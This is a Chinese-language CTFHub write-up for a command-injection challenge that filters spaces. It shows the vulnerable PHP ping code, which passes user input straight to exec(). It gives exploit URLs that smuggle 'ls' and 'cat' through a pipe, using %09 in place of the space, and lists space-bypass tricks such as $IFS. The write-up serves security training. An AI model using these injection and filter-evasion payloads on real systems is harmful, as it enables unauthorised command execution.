CTFHub | 过滤空格

检查网页源代码发现这题如果有空格就不会执行，说明这题对空格做了过滤处理。同样在输入框中输入 IP 进行测试，可以正常回显。

文章共804字 · 阅读需要大约3分钟

一键AI生成摘要，助你高效阅读

问答

尼泊罗河伯

991人浏览 · 2023-06-20 22:40:25

尼泊罗河伯 · 2023-06-20 22:40:25 发布

0x00 前言

CTFHub 专注网络安全、信息安全、白帽子技术的在线学习，实训平台。提供优质的赛事及学习服务，拥有完善的题目环境及配套 writeup ，降低 CTF 学习入门门槛，快速帮助选手成长，跟随主流比赛潮流。

0x01 题目描述

过滤空格：

这次过滤了空格，你能绕过吗。

0x02 解题过程

Ⅰ检查网页源代码发现这题如果有空格就不会执行，说明这题对空格做了过滤处理。同样在输入框中输入 IP 进行测试，可以正常回显。

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/ /", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

Ⅱ在 URL 后加入管道符号，输入 ls 命令进行查看，同样发现一个 flag 可疑文件。

http://challenge-150707dae6f3ddfe.sandbox.ctfhub.com:10800/?ip=127.0.0.1|ls

Ⅲ在管道符后输入 cat flag 命令进行查看。因为这题过滤了空格，如果在 URL 中输入空格，则不会执行 ping 命令。那么这里将空格替换为 %09 ，也就是 ASCII 的 Tab 键。检查网页，同样是有传递无内容，检查网页源代码发现此题 flag 。

http://challenge-150707dae6f3ddfe.sandbox.ctfhub.com:10800/?ip=127.0.0.1|cat%09flag_5338166523061.php

0x03 常见绕过方法

过滤空格指的是从一段文本中去除空格，即删除字符串中的空格字符。在 URL 中，我们输入的符号都会由 URL 编码进行转换输出，例如 %20 在 URL 中就代表空格的意思。

名称	介绍
<	表示输入重定向，可以将文件或命令的输出作为输入传递给另一个命令。
<>	表示输入输出的重定向。可以将文件或命令的输出作为输入传递给另一个命令，并将输出重定向到另一个文件。
%09	在 URL 中表示制表符。
%20	在 URL 中表示空格。
$IFS	直接使用 $IFS 变量表示空格。
\${IFS}	与 $IFS 变量一致，添加了反斜杠以及大括号。